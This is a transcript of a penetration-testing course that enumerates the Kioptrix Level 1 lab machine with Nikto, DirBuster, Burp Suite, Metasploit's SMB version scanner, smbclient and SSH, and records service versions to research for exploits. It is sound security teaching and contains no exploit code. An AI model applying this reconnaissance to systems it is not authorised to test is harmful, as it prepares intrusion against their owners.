We've also got Apache running on port 443, and we've got this rpcbind and 139. Now remember from the networking lesson, these kind of always play together, so we've got SMB open, basically Samba shares. And what we can do, the first step, is usually enumeration. Once we see this, we take the scan and we scroll down a little bit as well, and we can look at some things and see, okay, there's the OS information. It found Linux here, 2.4.x, and it's most likely pulling that down from the Apache; it's probably a best guess, because it's running Red Hat, that it's running Linux, and taking a stab at it here, or it may have actually determined that from some sort of header or some other location. A lot of times this isn't as sure as it's saying it is here; a lot of times it'll give you a percentage. So the OS is not always as definitive as it is here. So we've got the OS, which could be useful for us later when we do enumeration, and you'll see how that comes into play.

What I want you to take in right now is that so far we've got a scan result back, and that scan has gone out and it has looked for open ports, doing that modified stealth handshake. So it says SYN, SYN-ACK, reset (RST). Doing that, it's found a few open ports. Now it is our job to look up the information that we are seeing on these open ports and try to find exploits on them. So that's what we're going to do, and I'm going to cover, in the next video, kind of step by step. I'll talk through the methodology and why I attack certain ports first, what ports those are, how we can enumerate those ports, and then we'll enumerate everything, get all the details down. Once we have all the details down, we're going to move into the section on exploitation. It's going to get really fun, and we'll exploit this machine in multiple ways. So from here, just take away from the lesson that you've officially successfully scanned this machine. I encourage you to maybe go back and take notes, or to go back and scan it again, and get the syntax down in your head. Keep typing this out, remember it; this is the one thing you're probably going to type out more than anything else. And then also go through and look at the different types of options you have there. If there's one that interests you, just run it against the machine, play around with it. This is your lab time; make the most of it. So for now, that's it. In the next video, we're going to start enumerating these ports, so I will catch you over in the next video.

Let's talk about the scan before we dive into any enumeration. So the scan here: we've got these open ports. We've got 22 with SSH, and we've got 80 and 443, which are hosting websites, and then we've got 139, which has got a file share with Samba on it, and then you've got the 111 and 32768, which are RPC and related to the SMB. So we need to think about the point of attack as an attacker. Now, when I see this scan, I light up with 80 and 443, and I light up with 139, and sometimes you'll see 445 with it as well. I light up from those because those are commonly found with exploits. If we think back about all of the exploits that have been out there for a website, for example, or if we think to Samba or SMB-related exploits: just recently (I'm recording this in 2019), in 2017 there was malware that went around called WannaCry, and that was based off of something called EternalBlue, also known as MS17-010. It was a pretty wicked exploit that utilized a flaw in SMB. SMB has been historically bad, and websites have been historically bad. Now, when we see something like port 22, port 22 is SSH, and historically it hasn't really been that bad. Now, we can try attacks against it like brute-force attacks; we can try something like default credentials or root/toor on it, for example. But when we look at it, we can maybe enumerate the version, but there's not usually what we call remote code execution on SSH, remote code execution being that we can run an exploit against it and get something called a shell back. We'll talk more about that when we
get into the exploitation section, but for now just know that it's not really common to attack SSH. So when I see SSH open, we can do some things at it, but when we talk about low-hanging fruit, and that's really what we're after as an attacker, we're going to see what's juiciest first and kind of go from there. So you'll develop your own methodology over time, but I'm going to drill into your head at least my methodology, why I do things, and there will be several videos of walkthrough machines in this course, so you're going to get to see this over and over and over, and I'm just going to explain my methodology repeatedly so that you can get introduced to new tools and new ideas and ways of thinking.

So from here, I do want to dive into my first thought process, which is: I want to investigate port 80. And I would either, here, do 80/443, or I'd go right after 139. So we'll do 80/443 and start working towards those. Now let's go ahead and just do the first step. This is always my first step: if I see a website, I'm just going to go out to the website. So I'm going to go ahead and just copy this here, and I'm also going to go into the little hamburger menu and go to my preferences. I have not turned off my Burp Suite settings, and it's possible that if you're just following along, you haven't turned it off either. So go ahead and just select "use system proxy settings," and we'll just say OK, and now we should be able to navigate to our website. I'll just open up a new tab just in case. We'll do something like this. Good, that worked. And then we'll do the HTTPS version, because there's also 443. You might get something saying your connection's not secure; just go ahead and say Advanced and add an exception here, confirm it, and you'll see this. Okay.

So what we have here on both of these is a default web page. Now, when we talk about performing a network penetration test, or even a web application penetration test, if we see a default web page like this, this is an automatic finding. Now why is this a finding? Is it exploitable? No, not really, but it tells us a little bit of something about the architecture that's running behind the scenes, and it tells us a little bit about the client's potential hygiene. So if we see this, well, we know that it's running Apache; we know that potentially the box is running Red Hat Linux; and we're just getting ideas of what's going on behind the scenes. More so, if a client is running a default web page, it brings up two questions. One: are there other web directories behind this? So we'll show you something here in a second where we do directory busting and attempt to find a directory. Like, say we're looking at this and we don't have anything to click on, but we say, you know, /admin, maybe that directory's there, okay? Are they hosting a website somewhere else that's just not at this IP address on this base? Or maybe they aren't hosting any website, and they just left 443 and 80 open for no reason and put this default web page out there. Now, when you think about that, that signals to an attacker poor hygiene, and I'm going to think to myself as an attacker: if a company or client is willing to just put this out there willy-nilly, what else are they doing? What potential vulnerabilities might they have if they're doing this? So this immediately signals poor hygiene. We would write this up on a test, and I'm going to show you guys my notes once we kind of get towards the end of the enumeration. So make sure you're taking good notes, and we can do that in a little notepad here. I think this is useful, and then I'll make a nice little KeepNote, or you can make a CherryTree and make your own notes out of this, and I'll show you what it looks like towards the end of the enumeration. But we can say something like "80, 443," and then you can put the IP address, and sometimes people like to put notes at what time they did this, so you could see up here it's 22:58, or 10:58 PM my time, and we could take that and we can just say "default web page," and we can say "Apache," and we could tell that it's running potentially PHP, and we'll get behind this as well. We just have these little notes so we know that we navigated to it, right? At least this is part of the enumeration here, and you don't have to timestamp everything; I'm just giving you that for an example. But we can see that it's running this default web page.

So we have a default web page. There's nothing really for us to click on; I mean, we've got the documentation we can go to. It looks like the manual might be here, and this here, we just clicked on a link and it was a bad link. Now this is also what's called information disclosure, so this will be another one to bring up. We see here that we have an error page, and this error page is saying, "hey, it's not found." Now this is typical of what's called a 404, and when you see a 404 you think, okay, it usually redirects you to a page that's like, "hey, we can't find this." This is giving us a little bit more information than we should be getting. We're seeing here that we're getting Apache version 1.3.20, so now, if we didn't know already, we do know that we're running Apache 1.3.20, and we've got a hostname here, kioptrix.level1. That is internal information, a hostname, right? So we can get the naming convention out of a client; we could potentially know how they are utilizing naming conventions on their internal networks, and we've got some version enumeration or information disclosure. So this would be a screenshot as well that we would take a picture of, and you can also notate that in your notes and say something like "information disclosure," and then you could say something like "404 page," and then you would just have your notes or a screenshot of this, and that would indicate to you what you can write up on the report and kind of where you found it. So we can click around on this page, or we can do a little bit of what I like to do, which is vulnerability scanning. So I'm going to introduce
you to another tool, which is called Nikto. So let's open up a new tab (we can close these two tabs out if you've got extra tabs like I do), and this tool is called Nikto; it's spelled just like this. So Nikto is what is known as a web vulnerability scanner. This is a great tool when you're learning the beginning stuff, when you're practicing against VulnHub, or you're practicing on a CTF, or something like Hack The Box, which I haven't introduced to you yet, but it will help you do vulnerability scanning against the website. The issue is that if the website is running good security, you might run into some issues with that, and it might actually auto-block it if it detects Nikto scans. Not always; very commonly that's not the case, but if they've got good security or a good web application firewall, it might actually block these scans. So you have to be a little wary when you use it, and really use your hunch about whether you think this client is using a web application firewall or not. You'll really get a feel for the client as you gain more practice, and once you're getting in there and you're starting to notice vulnerabilities or not, you'll kind of understand whether or not they're running something like that.

So from here, we're just going to say nikto, and you can always do --help, but it's pretty straightforward. All we're going to do is say -h for host, and then we're just going to say something like https:// and then paste our address, something like this. And that one did not work, so let's go ahead and try http://, and there we go. For some reason it's not picking up the SSL on this, so I'm not sure why it's not discovering it, but now we can see our scan kicking back, and immediately we can see that it's doing some detection here. It's detecting that the server, Apache 1.3.20, is running; it sees this mod_ssl with OpenSSL; it's giving us some vulnerabilities back; it's telling us what is missing in terms of protections. Now, these protection headers: if we're doing an external penetration test, they're not really that important; if we're doing a web app penetration test, these become more important. But we don't have to worry about them right now.

So when we come through, we keep looking, and we see Apache 1.3.20 appears to be outdated, okay; mod_ssl appears to be outdated; OpenSSL appears to be outdated. These are all findings, depending on how outdated it is. A 1.3.20 to a 2.4.37 is pretty outdated, so these would be findings that we would notate on a report as well. We can look through, and you can see what types of attacks this might be vulnerable to. So, one, if you're looking through, there's this Apache one here that says remote denial of service. Well, typically denial of service is out of scope when we're doing a pen test, so we're not interested in that. Possible code execution: so maybe interested in that. We are also potentially interested in an overflow and rewrite, and this one says this is vulnerable to a remote buffer overflow, remote being important, which may allow a remote shell. So remote meaning we do not have to be local. I skipped over this one where you see "local"; this one is remote, meaning we can run that against a site sitting in our pajamas in our house, and that site's running somewhere else, and we can do this all remotely. So immediately it's found potential vulnerabilities. We've got this potential mod_ssl vulnerability, and it's come down here, and it's looking at some other things. You can see that this TRACE method is active. We still haven't gotten into web apps, so I really don't need to talk about it too much, but TRACE is potentially vulnerable when you have something like cross-site scripting, which you see up here, and that could lead to something called cross-site tracing, but you kind of need both of those. But again, that's just informational at this point; you don't have to really be taking notes on that.

So we're coming through, and it does a little bit of directory busting for us. What that means is it's just going to come through here and run a wordlist, and that wordlist might have things like admin, usage, manual, right, test.php. It's got all these different items that it found doing this wordlist. Now, we're going to do a little bit of directory busting here in a second, so we'll save this scan and we'll keep this in our notes, and we'll refer back to it here in a little bit. But what we need to know is we can Alt+Tab, get our text editor, and say something about, let's just copy and paste this line here, that potentially this mod_ssl is vulnerable. So let's copy that, and we'll put that into our text editor and make that as a note. So we're still doing enumeration; we're not going to do any exploitation until we get to the exploitation stage. So what we would typically do is save this out to a file. You might want to copy all of this right here to show what you ran (and if I could copy, that would be really useful). So you copy this, and you would just make a directory, and you could call this something like kioptrix, and then we could cd into kioptrix, and then you could say gedit nikto.txt, and then you have your Nikto scan saved. So this is part of being a good pen tester: saving all of your scans and having them available in case you need to go back for notes. So we'll save that, and then what we're going to do is pause here. We're going to call this part one, and then we'll go into part two and talk a little bit more about directory busting and look at some other enumeration features that we have for this, and then we'll start focusing on other ports and really enumerate this box thoroughly before we work on exploitation. So I will catch you over in part two of this video, and I'll see you when you get over there.

So now we're going to use a tool called DirBuster to do a little bit of directory busting. There are other tools out there that are similar or do the same thing. There are two built-in tools, in fact: there's DirBuster and
there's also a tool called dirb, and then there is a tool called gobuster, and you have a lot of options. My option of choice is DirBuster, but I do recommend that you write these down and just explore them for yourself and see which one you like the best. So I'm going to go ahead and run dirbuster, and I'm going to run it like this, with the ampersand at the end, and it's going to load up this nice little interface. And what we're going to do is we're going to say, hey, I want to run against this target URL. I'm going to go ahead and just copy this right here and I'll tab back into it. And syntax is important: it's going to want the port 80 at the end. You see the port 80 here with the slash. And we're going to say go ahead and go faster on these threads, and then we're going to go ahead and pick a list. So go ahead and go to Browse, and let's go ahead and go to your base folder here, go into your usr folder, your share, which is right here, and then if you start typing wordlists it'll bring up wordlists right here, and then you see DirBuster has its own folder right here. So we're going to select dirbuster, and from here we can pick a variety of different lists. I like to just use the small list. If I'm not finding anything at all, maybe I'll move up to the medium, and out on the interweb is a large list as well. Let's just go ahead and start with small for proof of concept.

And so now let's break it down. We've kind of talked about this in the last video, but let's just do a quick reminder. What we're doing is we're going out to web directories and we're using these wordlists, and these wordlists have hundreds if not thousands of different well-known directories. So it could be something like admin or like cgi-bin, etc., and it's going to go out and try to navigate to these. It's also going to look for specific file extensions. So we know that we're up against an Apache website; well, Apache runs PHP. If we were up against something like a Microsoft website, which is IIS, well, those tend to run
something called ASP or ASPX. And so this is why enumeration is important as well, because we need to know what's running on the back end to find or make the most use out of it. Now, what we can do with these file extensions, and what I like to do, is I like to run it against php or whatever the base of the server is, but I also do like to run something like a text file, something like a zip file, and you can make this as many as you want. You could say rar, pdf, docx, but the more of these that you put in there, the more times it's going to search, because it's going to search through the wordlist and say the wordlist has admin in it, it's going to try admin.pdf or admin.zip. So it's important to limit these to what you need. For our sake I'm just going to go ahead and just use php, and we're going to just scan with the defaults here and just kind of see what happens. So we'll go ahead and start that, and this will kick off and start scanning, and it's already finding stuff right away. You can see the list getting big, and you can go to this Results view where you can see what it's found, and you can also go to this Tree view here and see what it's found. You can kind of click in, you can see it's found some potentially interesting files. We can go enumerate these as well. It's found a test.php page. You can right-click on these and open in browser, and you can see that it's found this print test here in PHP 4. So we can look through some of these pages. We're gonna go ahead and just let that go for now. It's gonna take a minute. It could take up to a while to scan depending on how big your wordlist is, how many options you choose, and how well your website is cooperating with your scan as well.

So from here I'm going to show you a few more things. So let's go back to our preferences. If you still have that open, go ahead and go back, and let's go ahead and just go to the settings, and we'll go to our manual configuration, and let's boot up Burp Suite,
and this is just another proof of concept that Burp Suite is your friend, especially when you're looking at websites. So we're going to utilize it just to take a peek; I just want to see what's out there. So we'll go ahead and just hit Next and start Burp Suite here on this. And while we wait, another thing that I need to point out is, if this were a website, like a real website instead of a test page, a very important thing to do is view the source code. So we can right-click in here and we could say View Page Source and we can view the source code. Now, what we're looking for in source code are any kind of comments, potentially any kind of information disclosures. We might be looking for any sort of keys or passwords or user accounts or anything that might be disclosed in source code that should not be disclosed. A lot of times when you do CTFs or you do Hack The Box or VulnHub, they hide little comments in source code, but from a pen tester's point of view we're looking for more important things like the passwords or keys, etc.

So we've got Burp Suite open and we're just going to go ahead and intercept one request here, and we're going to go ahead and just let this forward. Actually, we'll send this to Repeater. I'm going to show you a little trick. Go ahead and send this to Repeater, so you right-click, Send to Repeater, and you'll see your Repeater tab opens up here. Now, the neat thing about Repeater is that Repeater will show you your response in real time, and you can modify these. So you could say, hey, I want to send this here, or you could say something like, I want to send a POST request maybe, and let that run, and you can see, well, it says okay, method not allowed, so it doesn't like that. But you can send different results, modify what you see here, and see how that works for us. Now, this is not taking this exactly, so let's forward and see maybe if we're missing anything, and we're not. So another thing that we can do is we can actually copy this, and what we can do is we go into the
Target here, and we've got the target showing. We could set the scope if we need to, so we can go to Scope here and we can just say Add and then paste this in here for http. We could do https for both, but let's just do http, and we'll just say Yes. And what this does for us is this limits it to only searching for in-scope items. So we're going to just limit now, and then we're going to go ahead and look at the response that came back. And you see there's no response here, but there is a 304 Not Modified, and the interesting thing is, look at the Server header. The Server header is disclosing information to us as well, and we saw this in the Nikto scan. It's all coming back around, right? We saw the Nikto scan say Apache 1.3.20, and it pulled down this Server header. This is why it's so useful, and this in itself, a screenshot of this right here, is information disclosure as well. So this client that we're working on has a little bit of information disclosure problems, and we can just say information disclosure here, and we'll do something, if I can type disclosure here, we'll say something like "server headers disclose version information," and we'll take a screenshot of that and we'll put that in our notes as well.

So we're going to get really deep into Burp Suite once we get to the web app section. I just like to get you utilizing it and familiar with it, just so you're comfortable by the time we get there. We're going to use it a few more times when we talk through network items, and then once we get to the web app it's going to be a lot of Burp Suite, so we get very comfortable with it very quick.

So let's take another peek at our DirBuster and see how that's working, and you can see that it still has 23 minutes, but I really just want to put you through the concept of it. The concept here is that we are looking for any sort of interesting directories, and you can see response codes here as well. If you've never seen a response code, just know for now that 200s mean okay, 400s
mean there's some sort of error, most typically like a 404 means page not found, and a 300 is typically a redirect, and then there's 500, which are like server errors or other. So what we're going to come in here and do is just kind of peek at these, and we can just kind of open these and see. icons, probably not that interesting. doc has nothing in it right now. The manual is not going to be that interesting to us, neither is usage. Maybe usage is interesting. Let's open one of these in the browser and we can see what's kind of running. And if you have your proxy on, go ahead and turn your intercept off; you see mine caught there. Okay, and now this is an interesting page here. We can see usage statistics, and this might give us a little bit of information disclosure if we're able to access it. At least here, well, we can see a couple of things. We see Webalizer version 2.01, so we can copy this and see if there's anything about this here on this machine that maybe is exploitable. So let's add this here as Webalizer version 2.01, and we'll just put it like on this usage.html. Now, we don't know for sure if this is running out on the web or if this is just an HTML page that has been generated by something else, so it's not for certain that it's actually running on this; it could just be something they have in this usage folder. But it's always good to notate what kind of items they might be using, and they're utilizing this Webalizer for sure, at least in their network. Again, this is probably a little bit of information disclosure or information leakage here, so they've got a consistent problem with that.

So let's go ahead and look more at the results, and mrtg is in here, and we can come through here and just look, like, what's mrtg? And we can open that in the browser, and it says, what is MRTG? This is Multi Router Traffic Grapher. Okay, and we could scroll through this, read the details, and we can keep going through here. And this could very well be a rabbit hole, but this kind of makes sense, and there's a
web server here, there's a log file. Let's view the log file. Nothing unique there. Let's view the web server, let's see if it's the same page, and it's a little bit different but not entirely different. So it's possible what we're seeing here is what we talked about in part one of this video, which is that we're seeing the test page is out there, and why was it out there, right? Is it poor hygiene? It's still poor hygiene even if they're running a web server, but they are running a web server here on the back end. Whether this web server is useful to us or not, I really don't know. So the goal through this is to dig, and this is my challenge for you: dig through these results that you get back. So wait until your scans finish here and dig through the results, look at all of these. To me right now it doesn't look that interesting, but again, we haven't fully enumerated. The real enumeration would be to go through each and every one of these and determine if there's anything of value here: is there any sort of service information that could be useful, etc.

So where we're at on the web ports at the moment, again as a recap: we have our scan back, right, and we've seen 80 is open and running Apache 1.3.20, we see 443 has got the same, we also know about the mod_ssl 2.8.4 and OpenSSL 0.9.6b. Doesn't hurt to copy this and put this in our notes too, because I think that's pretty useful. We've got that here; let's just go ahead and maybe put something up above just as a note. And we ran our Nikto scan and we saved this for our notes, so when we go write a report we have it ready, and we've got some information here that we've written down as well. So it appears that there are some potential vulnerabilities here, but we won't know until we start digging into Google, okay, and that will be very, very important. But we're going to get to that when we start getting into the end of this little series here, and then we transition into the exploitation part of the series,
we'll work on exploiting these. So this is just a few tricks on how you can enumerate websites. And when we're coming through and showing you these ports, and we go over all these ports that we see, we're going to come across new ports when we do pen tests, and what it comes down to is just having a methodology. You might discover a new port, and as long as you have a methodology, that's all you need. So we're going to work on building that methodology, and you might find other tools for searching websites that you like. You might say, hey, I hate your methods, or, you know, these tools just work better for me, and that's absolutely fine, as long as you're developing your own methodology. So just start thinking about, when you see a website, what are the basics that you're looking for? When you come across the website, you're looking for service version information, which we have here; you're looking for any sort of maybe back-end directories; you're looking for source code; you're looking for potential vulnerability scanning with Nikto; and any sort of information that you can divulge. Same thing we can come back here, we talked about it before, with Wappalyzer. You can click on Wappalyzer and see a lot of the same things that we saw: it knows the operating system, it knows the web server extensions, and it knows what's running on the back end. So there's a lot of useful information here, and this is all we are after at this point. We just want to scan and enumerate, and then we're going to dig deep and exploit. So that is it for this. We're going to move on to the next port in this section, we'll do a little bit more enumeration, see what else we can uncover. So I will catch you over in the next video.

Now that we've taken some time to enumerate web pages on port 80 and 443, we're going to go ahead and shift our focus over to SMB on port 139. So if you are unfamiliar with what SMB is, SMB is a file share. So think about your work environment. If you go to work, and let's say that you have a drive you access
that's not like your common drive, like a C drive; maybe it's like a Z drive or a G drive, and you access that drive to get files, and you can upload files, download files, and then maybe some of your co-workers can also see that file share, and that's why it's called a file share. Another example is, say you have a scans folder, and you go to your printer and you scan something, and magically it appears in your scans folder on your computer. That's another example of SMB. So SMB is commonly used in work environments and internal environments, so when we see it we think internal, and we think about all these exploits that I've mentioned in the past, especially with the latest and greatest being MS17-010, and even though it's two years old it still shows up, and it's gonna show up again in this course later on.

So what we're gonna do is we're just gonna take a quick look at our scan and see what we have available to us. So on port 139 here we see that, okay, NetBIOS, SMB, workgroup MYGROUP, not really a lot of information. We could scroll down, and the great thing about the -A flag that I had you run with this scan is that it does run scripts for us. So these scripts that we're running go out and do a little bit of enumeration, or additional enumeration, and here it came through and it's pulling down some information. We could see that, okay, the NetBIOS name of this is called KIOPTRIX. Well, we kinda already knew that. And we can see here that it's running SMB version 2. We really don't know that for sure, or what SMB version it's running exactly, so that's really important, because the type of SMB version that's running could potentially lead to an exploit, and we need to know that kind of information. So we're going to look for version information. The other thing is we're going to try to connect to this machine. We're going to see if there are any connections available to us, and if we can make that connection, if we can get to the files on the share, and see if there's anything
potentially malicious, or that we could do something potentially malicious with. So let's go ahead and get into a terminal, and we're going to load up a tool that you're going to be intimately familiar with by the time this course is over, and that tool is called Metasploit. So to run that tool, just go ahead and type in msfconsole like this and hit Enter. Now, Metasploit is an exploitation framework, and it does a lot more than exploitation. As you can see down here, you can see that it does exploits, what are called auxiliary modules. Now, auxiliary modules are like scanning and enumeration, so we can actually do port scanning, we can do all kinds of information gathering with these auxiliary modules. They're awesome; we're going to go through one right now. There's also these post modules, which do post-exploitation, so say we get a shell on a machine, which means we've exploited a machine, we can do some things in post. There's all different types of payloads, which we're going to cover when we get into the exploit section, and then the rest of this you don't have to worry about for the scope of this course. But we will be seeing another tool by Metasploit, which is msfvenom, later in the exploit development section of the course, because we're going to utilize that to build payloads out for our own shells. So what we're going to do for now is we're just going to introduce this slowly. Don't feel overwhelmed; it's just a little bit of a learning curve when it comes to learning all the features that it has available, but it's second nature once you learn it, and it's going to be one of the most commonly used tools that you use as a tester in the field.

So we're going to go ahead and just search for smb here, and I'm going to do this the terrible way. We're just going to search smb, and you can see that there's 121 results. Now, that's going to be quite a pain to sift through, but what we're after, and say we didn't know much but we were trying to see if, hey, maybe, does Metasploit have any kind of
modules, I don't know, for SMB enumeration? Well, we know auxiliary modules are enumeration, and we can look right here in the front and see what type of module it is. So you see this is a post module, and you see we can scroll up and we're going through exploits, and then we're going to go up into auxiliary. Now, the second part of this is the type of action it's doing, so you can see auxiliary denial of service, auxiliary fuzzing, auxiliary scanning, gathering, and we're going to utilize this to our advantage. So we're going to take a look at the syntax. Now, what we are after is SMB version information, and if we look kind of through this we can come down to scanner here, and you can see it's looking at SMB1, 2, GPP, which we're going to talk about, MS17-010, which we've talked about; you have an auxiliary scanner to see if there's anything out there with that vulnerability. And if we look right here on number 60, auxiliary/scanner/smb/smb_version. Now, this is a bit of a long, convoluted way to do this. Go ahead and copy this, by the way, or memorize your number; I'll give you two options. This is a long way to do it, but I wanted to show you this way of doing it, because you're gonna get better at it. But, you know, when you see something on a scan result and you don't know a lot about the tool, the best thing that you can do is just say, hey, you know, I know Metasploit does things like this, let me see if maybe they have any sort of enumeration or exploitation. It never hurts to use the search feature to try to look up items and learn about them. So let's say we've never used this before. We're going to go ahead and just say use, and then we're going to paste this module in here. Your other option is, instead of pasting this module, you can put the number that you had, so like, for example, 60; you could say use 60 and it will also load this module. So go ahead and hit Enter for that, and you can see here that it says now we're in the auxiliary module of scanner/smb/smb_version. So from here it's always good to
type out info and see what info is available, and it just tells you a little bit about the module that you're running. So here you see that this is going to display version information about each system. Perfect, it's an SMB version detection; that's really what we're after right now. So this is great, and we have options here, these basic options. Now, you're going to see me do this a lot: you can go right into options by just typing options and just see that, instead of printing out all the long stuff, if you don't want to. So in our options we're presented with some items. We've got something called RHOST. Now, RHOST stands for remote host. You're also going to see an LHOST later on, which stands for local host. RHOST is always the victim; that's who we are attacking, this is the target address. You might see RHOST or RHOSTS, plural. RHOST means you can only import one host; if we have RHOSTS, plural, we can use CIDR notation, meaning that we can put /24 and try to sweep a range, for example. But in this instance we're only attacking one machine anyway. The rest of these, SMB domain, password and user: if we knew the domain, password and user in this instance we could fill it out and try to get a little bit more information, but we are unauthenticated, we have no credentials at this point. So we're just going to go ahead and just put in RHOSTS, which is required, and not fill out any of the non-required fields here. And what we're going to do is we're just going to say set RHOSTS, and this isn't case sensitive, I just like to type it out case sensitive, and then the IP address of the machine that you're going to scan. So we're going to say 192.168.57.139, and then I'm just going to type in run. Give you a second to catch up, and run. Okay, I totally lied: my IP address is 139, the machine I'm after is 134. And run. Your screen should look something like this. I'm over here, instead of copying and pasting, trying to memorize, so hopefully you can see that I make mistakes too. So here
we are. We see a little bit more information, and it might not look like a lot right now, but knowing the Samba 2.2.1a is very specific, and this is going to help us out quite a bit. So let's just copy this guy and let's open up that text editor we've had going, and let's just come in here and maybe make some notes, or just put it in here and say something like SMB, and then we can just paste that. We know the version now, and this is going to become important when we start doing research on what we've found. So we found all these different types of versions running up here, and we're going to do research on exploitations against them, but we're also going to do research on this and exploitations against this. So as much detail as we can get, that's what's important, and what's going to set you apart from other hackers, or other people even trying to break into the field, is your ability to information gather and your ability to enumerate. If you can do both of those, the exploitation is actually the easy part, in my opinion.

So we've got the version information, that's great. We're going to use a new tool now, so go ahead and go File, New Tab, and I'm going to go ahead and show you a tool called smbclient. Now, smbclient is going to attempt to connect to the file share that's out there. Now, if we have the ability to connect to the file share with anonymous access, what that'll do is we can get in there and we can potentially see files. Now, these files might give us an inkling of what's going on in the network, or they may even be, you know, valuable to us. They might be something like a backup file, or passwords stored in a text file. You never know what you're going to find until you actually look. So what I'm going to go ahead and do is do a -L, and that's going to be to list out the files, and then the syntax looks something like this: you can do two backslashes, I like to do four, it really doesn't matter, and then you just type in the IP address of the machine that you want to try to connect to,
so 192.168.57.134 for me, and then two more slashes like that. If you're running it with just two slashes you don't have to put any there; this is just character escaping because we're in Linux. So go ahead and hit Enter, and you see that the server does not support extended security. Okay, don't worry about that. Anonymous login successful. Go ahead and hit Enter on root's password, because we don't know it, and you can see that we did list out the file shares. So let's go ahead and try to connect a different way. Let's tab up and let's delete this -L, and we see that there are two file shares: there is an IPC$ and an ADMIN$. The IPC$ is not really usually valuable to us, but the ADMIN$ would be really valuable if we could connect to that. So let's go ahead and just paste that in here and see if we can get that connection. Okay, let's try this, hit Enter, and you can see we have wrong password, so it's not going to let us connect to this share with anonymous access. So that's unfortunate. We could also try, proof of concept, to see if IPC$ works. Hit Enter on that, and you can see now we're actually in this, and this is interesting. So we could say help to see the list of commands, and it's very similar to being inside of a Linux machine. Now we can do something like ls to list the files, and we're actually access denied here. So this is what we call a dead end. We can't really access this, so we don't have any extra information gathered. We're going to come back to this time and time again with smbclient; this isn't the last time you're going to see it in the course, but I want you to know that it exists and the reason behind what we're doing here. And this is some of where the information is coming from in our scan: we're trying to connect out, we see the server name's KIOPTRIX, there's a comment that it's a Samba server, and we're going to try to come in here and connect to a file and maybe get lucky, but this time we didn't get lucky. So we're just gonna go ahead and exit out. So that's
all you need to know right now for SMB. SMB is an amazing protocol; when I see SMB I get very happy. But we're going to focus on that very heavily when we get into the internal part, the Active Directory portion of this course, because that's when things get really juicy. Right now we're just going to keep it simple, stupid, on a lot of this stuff. It might feel really easy or very, very straightforward, depending, but I promise this is just going to keep building and building and building until we have a pretty big understanding of this, and there's going to be a lot of repetition and a lot of practice, and I think that's the best way to learn. So from here I'm going to do a brief enumeration on SSH, how we can do enumeration with SSH, and then we're going to talk other items of enumeration and talk research. What are we doing? We've been collecting all this information and putting it into a text document. You're probably like, so what? What can we do with it? And that's where things get exciting, and that's how we start to lead into exploitation. But we've got to do a little bit more research first before we can get there. So that's it for this video. I'll catch you over in the next video when we are enumerating SSH.

So now let's take a look at SSH. So from the original scan we saw that it was open, and we saw OpenSSH 2.9p2. So we're going to copy this and just make a note of that in our notes as well; I think that's important. So we'll just say SSH, we've got the version there. So let's take this and let's do a little bit of enumeration and talk through it. So sometimes you're going to get a scan back and your scan is not going to really have a version here; it's just going to say ssh, and we can go and try to find that out ourselves, and it's always good to attempt that. What we're going to do is we're going to attempt to connect to SSH on this specific port and see if it gives us any information about what's running, and that's really it at this point. That's most of the enumeration that we can
do. Anything with SSH, the second that we attempt to make a login attempt, is going to be exploitation. Even if we just try one password guess, that's exploitation. So we're not going to do that right now; we're going to save that for the exploitation part of the course. But I do want to show you a connection, and just something funky with this anyway. So let's go ahead and just go to our terminal, and the typical way to SSH, if you've never done it before, is you just say ssh, and I want to SSH to a specific IP address, so this is the IP address I want to SSH to. The issue with this box is this box is old, so when we go to try to SSH to it, it's going to say this: hey, we haven't found a matching key exchange. So they're giving us a few different offers here. We're gonna have to type in a little bit of syntax. This is not common, but this is also useful to have in your notes, because this does come up occasionally. So we can just say -o, and we're going to type KexAlgorithms like this, and then an equals sign and a plus sign, and I'll stall for just a second so you can catch up, and then I'm going to copy this one here and then I'm going to paste it. And you're going to see we're going to get one more error, and this is going to ask about a cipher. So it says there's no cipher found. We're going to do a -c for cipher, we're just going to copy this and we're going to paste it, and this should now provide the opportunity to connect. It says the authenticity can't be established, we've got an RSA fingerprint, do you want to connect? We're going to type in yes. Okay, and what's happening here is it's asking us for a password. There's nothing here for us, so I'm going to hit Ctrl-C. Why did we do this? Why do we even attempt to make this connection? Well, sometimes what happens is a banner is exposed, and the banner will say, hey, we're running SSH version XYZ, and this is built by this person, by this company, etc. So here we're looking for a banner. Unfortunately there was no banner, so that doesn't give us
a lot of information, but fortunately for us, when we had our scan here, we were able to pull down at least the OpenSSH 2.9p2. So that's it, and I told you in the beginning SSH isn't very exciting, because there's not a lot of opportunities for, like, remote code execution. Really, the way we're gonna have to do this is hammer it with brute force, and we'll talk about the reasonings why later, but we'll have to hammer it with brute force and just spray and pray, as we like to call it sometimes. But for now that's it for SSH. So we're gonna start moving into research, different tools we can use to research vulnerabilities, and additional videos on that. So I'll catch you over in the next video when we start digging into some of what we found.

Let's talk now about identifying and researching potential vulnerabilities. So we have our notes here, and all I've done is move them off of Notepad and into CherryTree, because CherryTree is a bit more visual and a bigger font for us on video. And I made two nodes: I made the main node here of Notes, and then I made a child node here of Vulnerabilities. So if we recall from our notes, we have 80 and 443, and we've identified some findings that we're going to write up on a pen test report, and those findings are, you know, a default web page, the 404 page was giving a little bit of information disclosure, and the server headers were disclosing some information as well. On top of that, we've identified some information that we need for research. Now, we've got 80 here, and on port 80 we've got this Apache, this mod_ssl and this OpenSSL that we could research, and when we ran our Nikto scan we identified something potentially juicy here, where mod_ssl 2.8.4 falls in line with this, which is 2.8.7 or lower, which is vulnerable to a remote buffer overflow which may allow a remote shell. Remote buffer overflow meaning that we don't have to be local, we can be remote, which we are, and we can gain access via a remote shell, meaning we can gain access to that machine.
So that's good, that's really good. The other one here we see is SMB, and we identified Samba version 2.2.1a. We also identified a Webalizer version 2.01, and we've identified OpenSSH 2.9p2. So for this video we're going to target the low-hanging fruit, and I put this in order of how I would attack it. Now, again, I always think 80, 443 and 139, 445 are the juiciest to me. This Webalizer might be juicy; OpenSSH, probably not that juicy. So what we're going to do is I'm going to go ahead and research 80 and 443, and then we'll research the SMB as well, and then I'll leave you to do a little digging on these just as practice, and we can see where we go.

